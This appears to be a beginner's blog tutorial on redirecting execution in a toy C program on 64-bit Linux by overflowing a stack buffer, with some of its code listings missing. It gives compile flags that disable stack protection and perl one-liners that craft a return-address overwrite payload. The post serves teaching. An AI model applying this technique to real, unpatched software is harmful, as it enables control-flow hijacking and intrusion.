How to exploit a buffer overflow vulnerability in Linux

In this simple howto we will see how the execution flow of a program can be redirected, by exploiting a BOF (Buffer Overflow) vulnerability. If you are not familiar with this term or its use, please refer to the wiki page.

In this howto I will assume that all of you have (at least) a basic knowledge of:

  1. Assembly
  2. C
  3. gdb
  4. Function calling convetions

If you don't meet one or more of the above ponts, I suggest you to gather more information about them.
Few further notes before to begin:

  1. The machine I use, has installed Ubuntu 12.04 64 bit with a kernel v.3.5.0-40. Since my machine has a 64 bit core, the addresses shown in this howto will be 8 bytes long. Anyway this fact changes almost nothing!
  2. BOF exploits become harder since the Linux Kernel 2.4 has been relased, due to the introduction of several protections (on stack, execution flags, ALSR, etc.). Thus, in order to let the example programs in this howto work, we will compile them with the -fno-stack-protector flag on. This flag merely says to the compiler to do not activate the stack protection.

Let us begin!

Take a look at the following main:

As you can see, the purpose of the above code, merely is to take characters from the keyboard, as long as an 'x' is entered, then counting the number of characters insterted, and finally saying if such a number is even or odd.
Two considerations:

  • the function bof() is actually never called by the main. Hence its body is never executed by the lead execution flow.
  • there is an error in managing the buf buffer.
  • The buffer buf is thought to contain only 10 characters, but actually there is not any control to enforce that. Here it is the BOF vulnerability!
    In fact if we write more than 10 characters, the program will try to place all of them in the buffer buf, one by one. Not only 10. If the buffer is not enough large, the overflowing characters will be written in the near memory locations.
    Hence, let's try to pass to the program 50 chars.
    Little note:
    the expression: perl -e 'print "A"x50 . "x"' literally says "print A 50 times and append an x", try in a shell to believe.
    Furthermore we can leadly place the characters to write in a separate file, then passing them to the program with: $./progr < file
    This is going to work thanks to the operator of standard input redirection (i.e. <).

    So the steps to perform are:

  • $gcc -g -fno-stack-protector bof.c -o bof
  • $echo "`perl -e 'print "A"x50 . "x"'`" > expl
  • $./bof < expl
  • which gives us:

    Numer of insterted character is even
    [1] 17375 segmentation fault (core dumped) ./bof < expl


    What we get is a message error saying to us that a segmentation fault happened. This is happened because we have written so many A letters that we have overwritten the memory portions beyond the memory reserved for the buf variable. Particularly the memory location reserved to contain the memory address to jump when the return statement is executed, has been soiled. And this fact has caused a fault. In fact the fault happened when the return statement is executed
    Let's take a closer look by using the gdb debugger (GNU debugger):

    Let's see the program body, and let's fix a breakpoint just before the return statement.

    Ok, now let's run the program giving to it the 50 'A's as showed before.

    The program has stopped at the breakpoint. Up to now the program it is not crashed yet. In fact, as said before, it will crash during the execution of the return statement. Not before.
    So, let's see the assembly code:

    As we can see the return statement is performed by the three latest instructions. Particularly the purpose of the very last one (retq) is to pop up an 8 byte value from the the top of the stack and jumping into it.
    Usually, at this point of a program execution, the top of the stack would contain a valid address. So, let's skip two machine instructions and see what actually the top of stack contains:

    As we can see, the top of the stack contains a list of apparently strange characters. If we are familiar with the ASCII table, we will note immediately that what the stack contains actually is a list of A! So, what happened?
    It merely happened, that we wrote a numer of A long enough to overwrite the stack starting from the location of the variable buf, up to the place where the returning address should had been placed.
    Therefore when the retq statement is executed, the popped address will be not valid and thus a fault will be thrown.

    But, What would happen if we would write a valid address, instead of a list of A?
    Did you already guess, didn't you? The execution flow will be redirect where the address says!!
    So, let's do it!

    First of all: we just need to write a number of chars long enough to write the first location of stack, when the retq will be executed. Therefore, as the above stack snippet shows, 50 chars are too many.
    If we look at the above snippet, we will see that we have written 18 byte more. Hence the right length of our string will be: 50 - 18 = 32 bytes.
    Now, let's take the address of the function bof(): What we have to do now is to write 24 'A's and a 8 byte long address.
    In fact, even though the above address is showed using only 3 bytes, we have to represent it completely, hence on 8 bytes; hence: 0x0000000000400634. Furthermore, my machine uses a little endian representation (and probably also yours), hence the bytes of the address have to be written using this correct representation. Hence the address in the little endian representation, and written in bytes, became: \x34\x06\x40\x00\x00\x00\x00\x00.

    From another terminal, let's modify the expl file writing in it the new string and let's launch again the program:

    1. $echo "`perl -e 'print "A"x24 . "\x34\x06\x40\x00\x00\x00\x00\x00" . "x"'`" > expl
    2. $./bof < expl

    which magically gives us:

    $./bof < expl
    Numer of insterted character is even
    WTF!
    [1] 18534 segmentation fault (core dumped) ./bof < expl


    In a nuthsell, what happened is:

  • We have written a number of characters long enough to completely write the stack location of the returning address of the bof progam.
  • The characters which were been written in that precise location of memory, represent a valid address within the program
  • The return statement in executing the retq assembly statement, pop such an address and jump into it. Trying thus to execute the instructions contained
  • So, this was the way to redirect an execution flow by exploiting a buffer overflow. Obviously this was a really useless example, I left you to think what we could do with this kind of vulnerabilities. Bye.